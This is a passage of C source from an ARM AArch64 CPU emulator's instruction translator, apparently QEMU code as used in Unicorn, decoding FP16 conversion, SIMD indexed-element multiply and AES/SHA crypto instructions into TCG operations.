case 0x5a: /* FCVTNU */ need_rmode = true; rmode = FPROUNDING_TIEEVEN; break; case 0x5b: /* FCVTMU */ need_rmode = true; rmode = FPROUNDING_NEGINF; break; case 0x5c: /* FCVTAU */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; break; case 0x7a: /* FCVTPU */ need_rmode = true; rmode = FPROUNDING_POSINF; break; case 0x7b: /* FCVTZU */ need_rmode = true; rmode = FPROUNDING_ZERO; break; case 0x2f: /* FABS */ case 0x6f: /* FNEG */ need_fpst = false; break; case 0x7d: /* FRSQRTE */ case 0x7f: /* FSQRT (vector) */ break; default: fprintf(stderr, "%s: insn %#04x fpop %#2x\n", __func__, insn, fpop); g_assert_not_reached(); } /* Check additional constraints for the scalar encoding */ if (is_scalar) { if (!is_q) { unallocated_encoding(s); return; } /* FRINTxx is only in the vector form */ if (only_in_vector) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } if (need_rmode || need_fpst) { tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, true); } if (need_rmode) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } if (is_scalar) { TCGv_i32 tcg_op = read_fp_hreg(s, rn); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpop) { case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ gen_helper_advsimd_f16tosinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ gen_helper_advsimd_f16touinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x6f: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } /* limit any sign extension going on */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0xffff); write_fp_sreg(s, rd, tcg_res); 
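        /*
         * Illustrative aside (not part of the translator): on FP16,
         * FNEG and FABS are pure sign-bit operations, which is why this
         * function implements them with plain tcg_gen_xori_i32 /
         * tcg_gen_andi_i32 on the raw bits (the scalar FNEG case above,
         * and the FABS/FNEG cases in the vector loop below) rather than
         * calling a softfloat helper. A scalar model over the raw
         * 16-bit encoding:
         *
         *     static uint16_t fneg16(uint16_t x) { return x ^ 0x8000; }
         *     static uint16_t fabs16(uint16_t x) { return x & 0x7fff; }
         *
         * The final andi with 0xffff above merely keeps the result
         * zero-extended in its 32-bit TCG temporary.
         */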
tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } else { for (pass = 0; pass < (is_q ? 8 : 4); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, MO_16); switch (fpop) { case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ gen_helper_advsimd_f16tosinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ gen_helper_advsimd_f16touinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_advsimd_rinth(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_advsimd_rinth_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x2f: /* FABS */ tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_op, 0x7fff); break; case 0x6f: /* FNEG */ tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_op, 0x8000); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x7f: /* FSQRT */ gen_helper_sqrt_f16(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } write_vec_element_i32(s, tcg_res, rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } clear_vec_high(s, is_q, rd); } if (tcg_rmode) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } if (tcg_fpstatus) { tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* AdvSIMD scalar x indexed element * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ * | 0 1 | U | 1 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | * +-----+---+-----------+------+---+---+------+-----+---+---+------+------+ * AdvSIMD vector x indexed element * 31 30 29 28 24 23 22 21 20 19 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ * | 0 | Q | U | 0 1 1 1 1 | size | L | M | Rm | opc | H | 0 | Rn | Rd | * +---+---+---+-----------+------+---+---+------+-----+---+---+------+------+ */ static void disas_simd_indexed(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This encoding has two kinds of instruction: * normal, where we perform elt x idxelt => elt for each * element in the vector * long, where we perform elt x idxelt and generate a result of * double the width of the input element * The long ops have a 'part' specifier (ie come in INSN, INSN2 pairs). 
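 *
 * Illustrative aside (not part of the decoder): scalar models of the
 * two shapes for 16-bit input lanes, assuming only C99 integer types:
 *
 *     #include <stdint.h>
 *
 *     // normal: elt x idxelt -> elt, e.g. MLA Vd.4H, Vn.4H, Vm.H[idx]
 *     static void mla_by_elem(uint16_t d[4], const uint16_t n[4],
 *                             uint16_t m)
 *     {
 *         for (int i = 0; i < 4; i++) {
 *             d[i] = (uint16_t)(d[i] + n[i] * m);
 *         }
 *     }
 *
 *     // long: elt x idxelt -> 2*elt, e.g. SMLAL Vd.4S, Vn.4H, Vm.H[idx];
 *     // the INSN2 form (SMLAL2) reads n[] from the high half instead
 *     static void smlal_by_elem(int32_t d[4], const int16_t n[4],
 *                               int16_t m)
 *     {
 *         for (int i = 0; i < 4; i++) {
 *             d[i] += (int32_t)n[i] * m;
 *         }
 *     }
 *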
*/ bool is_scalar = extract32(insn, 28, 1); bool is_q = extract32(insn, 30, 1); bool u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int l = extract32(insn, 21, 1); int m = extract32(insn, 20, 1); /* Note that the Rm field here is only 4 bits, not 5 as it usually is */ int rm = extract32(insn, 16, 4); int opcode = extract32(insn, 12, 4); int h = extract32(insn, 11, 1); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool is_long = false; int is_fp = 0; bool is_fp16 = false; int index; TCGv_ptr fpst; switch (16 * u + opcode) { case 0x08: /* MUL */ case 0x10: /* MLA */ case 0x14: /* MLS */ if (is_scalar) { unallocated_encoding(s); return; } break; case 0x02: /* SMLAL, SMLAL2 */ case 0x12: /* UMLAL, UMLAL2 */ case 0x06: /* SMLSL, SMLSL2 */ case 0x16: /* UMLSL, UMLSL2 */ case 0x0a: /* SMULL, SMULL2 */ case 0x1a: /* UMULL, UMULL2 */ if (is_scalar) { unallocated_encoding(s); return; } is_long = true; break; case 0x03: /* SQDMLAL, SQDMLAL2 */ case 0x07: /* SQDMLSL, SQDMLSL2 */ case 0x0b: /* SQDMULL, SQDMULL2 */ is_long = true; break; case 0x0c: /* SQDMULH */ case 0x0d: /* SQRDMULH */ break; case 0x01: /* FMLA */ case 0x05: /* FMLS */ case 0x09: /* FMUL */ case 0x19: /* FMULX */ is_fp = 1; break; case 0x1d: /* SQRDMLAH */ case 0x1f: /* SQRDMLSH */ if (!dc_isar_feature(aa64_rdm, s)) { unallocated_encoding(s); return; } break; case 0x0e: /* SDOT */ case 0x1e: /* UDOT */ if (is_scalar || size != MO_32 || !dc_isar_feature(aa64_dp, s)) { unallocated_encoding(s); return; } break; case 0x11: /* FCMLA #0 */ case 0x13: /* FCMLA #90 */ case 0x15: /* FCMLA #180 */ case 0x17: /* FCMLA #270 */ if (is_scalar || !dc_isar_feature(aa64_fcma, s)) { unallocated_encoding(s); return; } is_fp = 2; break; case 0x00: /* FMLAL */ case 0x04: /* FMLSL */ case 0x18: /* FMLAL2 */ case 0x1c: /* FMLSL2 */ if (is_scalar || size != MO_32 || !dc_isar_feature(aa64_fhm, s)) { unallocated_encoding(s); return; } size = MO_16; /* is_fp, but we pass tcg_ctx->cpu_env not fp_status. */ break; default: unallocated_encoding(s); return; } switch (is_fp) { case 1: /* normal fp */ /* convert insn encoded size to MemOp size */ switch (size) { case 0: /* half-precision */ size = MO_16; is_fp16 = true; break; case MO_32: /* single precision */ case MO_64: /* double precision */ break; default: unallocated_encoding(s); return; } break; case 2: /* complex fp */ /* Each indexable element is a complex pair. */ size += 1; switch (size) { case MO_32: if (h && !is_q) { unallocated_encoding(s); return; } is_fp16 = true; break; case MO_64: break; default: unallocated_encoding(s); return; } break; default: /* integer */ switch (size) { case MO_8: case MO_64: unallocated_encoding(s); return; } break; } if (is_fp16 && !dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } /* Given MemOp size, adjust register and indexing. */ switch (size) { case MO_16: index = h << 2 | l << 1 | m; break; case MO_32: index = h << 1 | l; rm |= m << 4; break; case MO_64: if (l || !is_q) { unallocated_encoding(s); return; } index = h; rm |= m << 4; break; default: g_assert_not_reached(); } if (!fp_access_check(s)) { return; } if (is_fp) { fpst = get_fpstatus_ptr(tcg_ctx, is_fp16); } else { fpst = NULL; } switch (16 * u + opcode) { case 0x0e: /* SDOT */ case 0x1e: /* UDOT */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, index, u ? 
gen_helper_gvec_udot_idx_b : gen_helper_gvec_sdot_idx_b); return; case 0x11: /* FCMLA #0 */ case 0x13: /* FCMLA #90 */ case 0x15: /* FCMLA #180 */ case 0x17: /* FCMLA #270 */ { int rot = extract32(insn, 13, 2); int data = (index << 2) | rot; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), fpst, is_q ? 16 : 8, vec_full_reg_size(s), data, size == MO_64 ? gen_helper_gvec_fcmlas_idx : gen_helper_gvec_fcmlah_idx); tcg_temp_free_ptr(tcg_ctx, fpst); } return; case 0x00: /* FMLAL */ case 0x04: /* FMLSL */ case 0x18: /* FMLAL2 */ case 0x1c: /* FMLSL2 */ { int is_s = extract32(opcode, 2, 1); int is_2 = u; int data = (index << 2) | (is_2 << 1) | is_s; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), data, gen_helper_gvec_fmlal_idx_a64); } return; } if (size == 3) { TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); int pass; assert(is_fp && is_q && !is_long); read_vec_element(s, tcg_idx, rm, index, MO_64); for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); switch (16 * u + opcode) { case 0x05: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negd(tcg_ctx, tcg_op, tcg_op); /* fall through */ case 0x01: /* FMLA */ read_vec_element(s, tcg_res, rd, pass, MO_64); gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); break; case 0x09: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; case 0x19: /* FMULX */ gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } tcg_temp_free_i64(tcg_ctx, tcg_idx); clear_vec_high(s, !is_scalar, rd); } else if (!is_long) { /* 32 bit floating point, or 16 or 32 bit integer. * For the 16 bit scalar case we use the usual Neon helpers and * rely on the fact that 0 op 0 == 0 with no side effects. */ TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 4 : 2; } read_vec_element_i32(s, tcg_idx, rm, index, size); if (size == 1 && !is_scalar) { /* The simplest way to handle the 16x16 indexed ops is to duplicate * the index into both halves of the 32 bit tcg_idx and then use * the usual Neon helpers. */ tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); } for (pass = 0; pass < maxpasses; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, is_scalar ? size : MO_32); switch (16 * u + opcode) { case 0x08: /* MUL */ case 0x10: /* MLA */ case 0x14: /* MLS */ { static NeonGenTwoOpFn * const fns[2][2] = { { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, { tcg_gen_add_i32, tcg_gen_sub_i32 }, }; NeonGenTwoOpFn *genfn; bool is_sub = opcode == 0x4; if (size == 1) { gen_helper_neon_mul_u16(tcg_ctx, tcg_res, tcg_op, tcg_idx); } else { tcg_gen_mul_i32(tcg_ctx, tcg_res, tcg_op, tcg_idx); } if (opcode == 0x8) { break; } read_vec_element_i32(s, tcg_op, rd, pass, MO_32); genfn = fns[size - 1][is_sub]; genfn(tcg_ctx, tcg_res, tcg_op, tcg_res); break; } case 0x05: /* FMLS */ case 0x01: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? 
size : MO_32); switch (size) { case 1: if (opcode == 0x5) { /* As usual for ARM, separate negation for fused * multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op, tcg_op, 0x80008000); } if (is_scalar) { gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); } else { gen_helper_advsimd_muladd2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); } break; case 2: if (opcode == 0x5) { /* As usual for ARM, separate negation for * fused multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op, tcg_op, 0x80000000); } gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op, tcg_idx, tcg_res, fpst); break; default: g_assert_not_reached(); } break; case 0x09: /* FMUL */ switch (size) { case 1: if (is_scalar) { gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } else { gen_helper_advsimd_mul2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } break; case 2: gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } break; case 0x19: /* FMULX */ switch (size) { case 1: if (is_scalar) { gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } else { gen_helper_advsimd_mulx2h(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); } break; case 2: gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op, tcg_idx, fpst); break; default: g_assert_not_reached(); } break; case 0x0c: /* SQDMULH */ if (size == 1) { gen_helper_neon_qdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } else { gen_helper_neon_qdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } break; case 0x0d: /* SQRDMULH */ if (size == 1) { gen_helper_neon_qrdmulh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } else { gen_helper_neon_qrdmulh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx); } break; case 0x1d: /* SQRDMLAH */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? size : MO_32); if (size == 1) { gen_helper_neon_qrdmlah_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } else { gen_helper_neon_qrdmlah_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } break; case 0x1f: /* SQRDMLSH */ read_vec_element_i32(s, tcg_res, rd, pass, is_scalar ? size : MO_32); if (size == 1) { gen_helper_neon_qrdmlsh_s16(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } else { gen_helper_neon_qrdmlsh_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op, tcg_idx, tcg_res); } break; default: g_assert_not_reached(); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } tcg_temp_free_i32(tcg_ctx, tcg_idx); clear_vec_high(s, is_q, rd); } else { /* long ops: 16x16->32 or 32x32->64 */ TCGv_i64 tcg_res[2]; int pass; bool satop = extract32(opcode, 0, 1); MemOp memop = MO_32; if (satop || !u) { memop |= MO_SIGN; } if (size == 2) { TCGv_i64 tcg_idx = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_idx, rm, index, memop); for (pass = 0; pass < (is_scalar ? 
1 : 2); pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_passres; int passelt; if (is_scalar) { passelt = 0; } else { passelt = pass + (is_q * 2); } read_vec_element(s, tcg_op, rn, passelt, memop); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); if (opcode == 0xa || opcode == 0xb) { /* Non-accumulating ops */ tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op, tcg_idx); tcg_temp_free_i64(tcg_ctx, tcg_op); if (satop) { /* saturating, doubling */ gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); } if (opcode == 0xa || opcode == 0xb) { continue; } /* Accumulating op: handle accumulate step */ read_vec_element(s, tcg_res[pass], rd, pass, MO_64); switch (opcode) { case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x7: /* SQDMLSL, SQDMLSL2 */ tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); /* fall through */ case 0x3: /* SQDMLAL, SQDMLAL2 */ gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i64(tcg_ctx, tcg_idx); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_idx = tcg_temp_new_i32(tcg_ctx); assert(size == 1); read_vec_element_i32(s, tcg_idx, rm, index, size); if (!is_scalar) { /* The simplest way to handle the 16x16 indexed ops is to * duplicate the index into both halves of the 32 bit tcg_idx * and then use the usual Neon helpers. */ tcg_gen_deposit_i32(tcg_ctx, tcg_idx, tcg_idx, tcg_idx, 16, 16); } for (pass = 0; pass < (is_scalar ? 
1 : 2); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i64 tcg_passres; if (is_scalar) { read_vec_element_i32(s, tcg_op, rn, pass, size); } else { read_vec_element_i32(s, tcg_op, rn, pass + (is_q * 2), MO_32); } tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); if (opcode == 0xa || opcode == 0xb) { /* Non-accumulating ops */ tcg_passres = tcg_res[pass]; } else { tcg_passres = tcg_temp_new_i64(tcg_ctx); } if (memop & MO_SIGN) { gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); } else { gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op, tcg_idx); } if (satop) { gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, tcg_passres, tcg_passres); } tcg_temp_free_i32(tcg_ctx, tcg_op); if (opcode == 0xa || opcode == 0xb) { continue; } /* Accumulating op: handle accumulate step */ read_vec_element(s, tcg_res[pass], rd, pass, MO_64); switch (opcode) { case 0x2: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x6: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ gen_helper_neon_subl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); break; case 0x7: /* SQDMLSL, SQDMLSL2 */ gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); /* fall through */ case 0x3: /* SQDMLAL, SQDMLAL2 */ gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_res[pass], tcg_passres); break; default: g_assert_not_reached(); } tcg_temp_free_i64(tcg_ctx, tcg_passres); } tcg_temp_free_i32(tcg_ctx, tcg_idx); if (is_scalar) { tcg_gen_ext32u_i64(tcg_ctx, tcg_res[0], tcg_res[0]); } } if (is_scalar) { tcg_res[1] = tcg_const_i64(tcg_ctx, 0); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* Crypto AES * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----------------+------+-----------+--------+-----+------+------+ * | 0 1 0 0 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | * +-----------------+------+-----------+--------+-----+------+------+ */ static void disas_crypto_aes(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int decrypt; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; TCGv_i32 tcg_decrypt; CryptoThreeOpIntFn *genfn; if (!dc_isar_feature(aa64_aes, s) || size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0x4: /* AESE */ decrypt = 0; genfn = gen_helper_crypto_aese; break; case 0x6: /* AESMC */ decrypt = 0; genfn = gen_helper_crypto_aesmc; break; case 0x5: /* AESD */ decrypt = 1; genfn = gen_helper_crypto_aese; break; case 0x7: /* AESIMC */ decrypt = 1; genfn = gen_helper_crypto_aesmc; break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_decrypt = tcg_const_i32(tcg_ctx, decrypt); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_decrypt); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_i32(tcg_ctx, tcg_decrypt); } /* Crypto three-reg SHA * 31 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 * +-----------------+------+---+------+---+--------+-----+------+------+ * | 0 1 0 1 1 1 1 0 | size | 0 | Rm | 0 | opcode | 0 0 | Rn | Rd | * +-----------------+------+---+------+---+--------+-----+------+------+ */ static void 
disas_crypto_three_reg_sha(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 3); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); CryptoThreeOpFn *genfn; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr; bool feature; if (size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0: /* SHA1C */ case 1: /* SHA1P */ case 2: /* SHA1M */ case 3: /* SHA1SU0 */ genfn = NULL; feature = dc_isar_feature(aa64_sha1, s); break; case 4: /* SHA256H */ genfn = gen_helper_crypto_sha256h; feature = dc_isar_feature(aa64_sha256, s); break; case 5: /* SHA256H2 */ genfn = gen_helper_crypto_sha256h2; feature = dc_isar_feature(aa64_sha256, s); break; case 6: /* SHA256SU1 */ genfn = gen_helper_crypto_sha256su1; feature = dc_isar_feature(aa64_sha256, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); tcg_rm_ptr = vec_full_reg_ptr(s, rm); if (genfn) { genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr); } else { TCGv_i32 tcg_opcode = tcg_const_i32(tcg_ctx, opcode); gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr, tcg_rm_ptr, tcg_opcode); tcg_temp_free_i32(tcg_ctx, tcg_opcode); } tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rm_ptr); } /* Crypto two-reg SHA * 31 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----------------+------+-----------+--------+-----+------+------+ * | 0 1 0 1 1 1 1 0 | size | 1 0 1 0 0 | opcode | 1 0 | Rn | Rd | * +-----------------+------+-----------+--------+-----+------+------+ */ static void disas_crypto_two_reg_sha(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); CryptoTwoOpFn *genfn; bool feature; TCGv_ptr tcg_rd_ptr, tcg_rn_ptr; if (size != 0) { unallocated_encoding(s); return; } switch (opcode) { case 0: /* SHA1H */ feature = dc_isar_feature(aa64_sha1, s); genfn = gen_helper_crypto_sha1h; break; case 1: /* SHA1SU1 */ feature = dc_isar_feature(aa64_sha1, s); genfn = gen_helper_crypto_sha1su1; break; case 2: /* SHA256SU0 */ feature = dc_isar_feature(aa64_sha256, s); genfn = gen_helper_crypto_sha256su0; break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd_ptr = vec_full_reg_ptr(s, rd); tcg_rn_ptr = vec_full_reg_ptr(s, rn); genfn(tcg_ctx, tcg_rd_ptr, tcg_rn_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rd_ptr); tcg_temp_free_ptr(tcg_ctx, tcg_rn_ptr); } /* Crypto three-reg SHA512 * 31 21 20 16 15 14 13 12 11 10 9 5 4 0 * +-----------------------+------+---+---+-----+--------+------+------+ * | 1 1 0 0 1 1 1 0 0 1 1 | Rm | 1 | O | 0 0 | opcode | Rn | Rd | * +-----------------------+------+---+---+-----+--------+------+------+ */ static void disas_crypto_three_reg_sha512(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode = extract32(insn, 10, 2); int o = extract32(insn, 14, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool feature; CryptoThreeOpFn *genfn; if (o == 0) { switch (opcode) { case 0: /* SHA512H */ feature = dc_isar_feature(aa64_sha512, s); genfn = gen_helper_crypto_sha512h; break; 
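/* SHA512H and SHA512H2 are the two halves of the SHA-512 hash
 * update, and SHA512SU1 (with SHA512SU0 below) updates the message
 * schedule; RAX1 has no helper and is open-coded in the
 * genfn == NULL path at the end of this function.
 */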
